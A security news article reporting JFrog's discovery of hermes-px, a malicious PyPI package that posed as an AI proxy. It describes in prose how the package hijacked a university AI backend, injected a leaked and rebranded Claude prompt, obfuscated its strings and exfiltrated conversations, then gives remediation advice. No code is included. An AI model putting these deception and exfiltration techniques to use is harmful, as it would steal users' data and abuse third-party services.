The Menace of the Malicious PyPI Package: "hermes-px"
In a startling revelation, the security team at JFrog has unveiled a malicious package on the Python Package Index (PyPI) named hermes-px. Posing as a "Secure AI Inference Proxy," this package is designed to deceitfully harvest user prompts while exploiting an artificial intelligence service operated by a private university. This alarming discovery highlights the sophisticated measures attackers are employing to infiltrate systems and harvest sensitive data.
Marketed as an OpenAI-compatible, Tor-routed proxy that requires no API keys, hermes-px disguises its true intent by hijacking an internal AI endpoint from Université Centrale in Tunisia. This malicious software injects a stolen prompt from Anthropic’s Claude model into user interactions and subsequently exfiltrates all conversations to an attacker-controlled Supabase database. Such deceitful actions not only violate user trust but also abuse legitimate academic resources.
What sets hermes-px apart from other subpar malware found on PyPI is its unusually polished documentation. Unlike typical rogue packages that lack thorough explanations, this one comes complete with installation instructions, a migration guide for those transitioning from the OpenAI SDK, and examples of Research and Generation (RAG) pipelines. It even includes detailed error handling notes which are strategically crafted to win over developers’ confidence.
The package establishes an API that closely mirrors the official OpenAI Python SDK. This design choice allows developers to effortlessly swap in hermes-px and call functions like client.chat.completions.create() with minimal code alterations, further disguising its intended malice. The README file goes a step further by promoting an "Interactive Learning CLI," instructing users to fetch and execute a remote Python script from a GitHub URL using functions like urllib.request and exec(), a glaring red flag that indicates the potential for runtime code injection.
This deceitful project is backed by a fictitious GitHub organization known as “EGen Labs,” which lends it an air of legitimacy, further complicating the detection of its malicious nature. The repository has since been taken down, returning a 404 error code, indicating that it had served as a flexible payload delivery channel without necessitating an updated PyPI release.
Hijacked University AI Backend
On a deeper level, hermes-px builds a requests.Session that utilizes spoofed browser headers, directing all inference traffic through a local Tor SOCKS5 proxy. This technique not only masks the attacker’s identity but also conceals the misuse of the upstream AI service. The target URL, which is encrypted, resolves to a private API endpoint at prod.universitecentrale[.]net:9443, aligning with the infrastructure of the Tunisian university. The setup even features a WAF-protected chat interface indicative of a legitimate campus AI advising chatbot.
The payload makes two encrypted references to "academic specialties," with instructions that align with typical academic advisor tasks, such as guiding students on subject selection in fields like mathematics, programming, and cybersecurity. Collectively, these indicators spotlight how hermes-px exploits a genuine academic service that was never intended for public access.
Among its components, the package includes a file named base_prompt.pz, which unpacks from 103 KB of encoded data into a massive 246,000-character system prompt that bears a striking resemblance to the leaked Claude model’s prompt. The malicious actor executed a bulk find-and-replace tactic, rebranding terms such as "Claude" to "AXIOM-1" and "Anthropic" to "EGen Labs." Yet, several unmistakable references were left intact, maintaining echoes of the original model.
During every request processed by hermes-px, this elaborate system prompt is injected, ensuring that the hijacked backend operates with a carefully crafted and proprietary context outlined by the attackers.
Response Laundering and Telemetry
To further misdirect users from the true upstream provider, hermes-px sanitizes its response. It replaces mentions of “OpenAI” with “EGen Labs” and alters other associated terminology, perpetuating the illusion of a proprietary AI model. Error messages related to quota exceeding are transformed into benign notifications that assert "the model is currently offline," redirecting users to fraudulent documentation.
However, the true peril of hermes-px is revealed in its telemetry module. This module masquerades as a benign feature but is designed to exfiltrate original user messages and AI responses to a Supabase database with each inference request. By default, this telemetry is enabled, employing an uncomplicated API call that bypasses the Tor protections, ultimately exposing the user’s real IP address while falsely offering anonymized AI interactions.
To evade detection, the package employs a complex three-tiered obfuscation system, wrapping sensitive strings—including URLs, headers, and credentials—in XOR encryption, zlib compression, and base64 encoding. This intricate layering significantly complicates static analysis and makes traditional detection tools less effective against hermes-px.
For developers who inadvertently implemented hermes-px, this malicious package has potentially compromised their entire digital environment. It grants unknown attackers access to full transcripts of user interactions, alongside critical metadata which could include sensitive credentials, internal codes, and other confidential information mistakenly transmitted through this "free" proxy service.
In light of these findings, JFrog strongly advises users to immediately uninstall hermes-px, rotate any relevant secrets that might have been exposed, and scrutinize conversations for any sensitive data leaks. As a precautionary measure, blocking the Supabase exfiltration domain and removing Tor—if installed solely for the operation of this package—is also suggested.
This troubling incident serves as a sobering reminder of the vulnerabilities present in the rapidly evolving landscape of cybersecurity and underscores the necessity for developers to remain vigilant against deceptive practices in software distribution.